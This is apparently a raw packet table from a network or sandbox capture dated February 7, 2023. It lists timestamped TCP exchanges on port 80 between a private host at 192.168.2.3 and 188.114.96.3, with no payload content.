                                                                                    Feb 7, 2023 19:45:01.837806940 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.837806940 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.837838888 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.837867975 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.837896109 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.837924004 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.837951899 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.837982893 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838011980 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838042974 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838077068 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838088989 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.838088989 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.838088989 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.838129044 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838160038 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838188887 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838218927 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838255882 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838267088 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.838267088 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.838267088 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.838299036 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838329077 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838360071 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838390112 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838419914 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838450909 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838480949 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838507891 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838537931 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838571072 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.838571072 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.838572025 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.838589907 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838623047 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838654041 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838682890 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838737011 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838768959 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838800907 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838835955 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838865995 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838896036 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838936090 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.838951111 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.838951111 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.838951111 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.838988066 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839023113 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839056015 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839091063 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839121103 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839159966 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839175940 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.839175940 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.839175940 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.839210987 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839243889 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839274883 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839306116 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839339018 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839373112 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.839373112 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.839373112 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.839396000 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839427948 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839461088 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839490891 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839523077 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839553118 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839584112 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.839585066 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.839585066 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.839611053 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839641094 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839673996 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839704990 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839735985 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839766026 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839797020 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.839797020 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.839797020 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.839818954 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839848042 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839876890 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839907885 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839939117 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.839998007 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840029955 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.840029955 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.840029955 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.840051889 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840085030 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840116978 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840152025 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840166092 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.840166092 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.840204000 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840235949 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840262890 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.840280056 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840310097 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840337992 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.840352058 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840380907 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840410948 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.840425014 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840456009 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840485096 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.840504885 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840537071 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840564966 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.840584040 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840614080 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840641022 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.840657949 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840687990 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840715885 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.840728045 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840753078 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840781927 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840809107 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840837955 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840867043 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.840878963 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840905905 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.840918064 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840943098 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840969086 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.840995073 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841020107 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841044903 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841072083 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841104031 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841113091 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.841131926 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.841152906 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841181993 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841208935 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841238022 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.841249943 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841275930 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.841288090 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841315031 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841339111 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841366053 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841394901 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.841407061 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841434956 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841464043 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841491938 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841521025 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.841531992 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841557980 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841584921 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841612101 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841638088 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.841653109 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841681004 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841711998 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841742992 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841774940 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.841785908 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841814041 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841840982 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.841852903 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841881037 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841911077 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.841922998 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841952085 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.841984034 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842011929 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.842026949 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842056036 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842082977 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.842099905 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842130899 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842160940 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.842179060 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842207909 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842236042 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.842252970 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842284918 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842313051 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.842329025 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842360973 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842389107 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.842403889 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842432976 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842463970 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.842475891 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842505932 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842534065 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.842549086 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842580080 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842607021 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.842622995 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842654943 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842684984 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.842720032 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842762947 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842796087 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.842808962 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842839003 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842866898 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.842883110 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842912912 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842941046 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.842953920 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.842984915 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843013048 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.843039036 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843069077 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843097925 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.843113899 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843142986 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843169928 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.843188047 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843214989 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.843225956 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843256950 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843287945 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843322039 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843350887 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.843362093 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843389988 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843416929 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.843430042 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843460083 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843492031 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843518972 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.843530893 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843559027 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.843569994 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843600035 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843633890 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843663931 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.843677998 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843708038 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843736887 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.843750000 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843786001 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843816042 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.843832016 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843862057 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843892097 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.843907118 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843935966 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.843964100 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.843981981 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844011068 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844041109 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.844053984 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844082117 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844110966 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.844122887 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844150066 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844177961 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844202042 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844228029 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844254017 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844280005 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844305992 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844336987 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844368935 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844378948 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.844378948 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.844409943 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844439983 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844448090 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.844474077 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844502926 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844511032 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.844537020 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844572067 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844584942 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.844618082 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844650030 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.844676018 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844710112 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844733000 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844758034 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844789028 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844799042 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.844799042 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.844820023 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.844820023 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.844846010 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844878912 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.844897985 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844933033 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.844963074 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.844974995 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.845005035 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.845016003 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.845046043 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.845058918 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.845088005 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.845108986 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.845141888 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.845170975 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.845184088 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.845210075 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.845221996 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.845247984 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.845261097 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.845288992 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.845309019 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.845345974 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.845372915 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.845386028 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.845412016 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.845424891 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.845453978 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.845464945 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.845498085 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.845525980 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.845558882 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.845586061 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.845597982 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.845623970 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.845638990 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.845668077 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.845693111 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.845726013 CET8049699188.114.96.3192.168.2.3
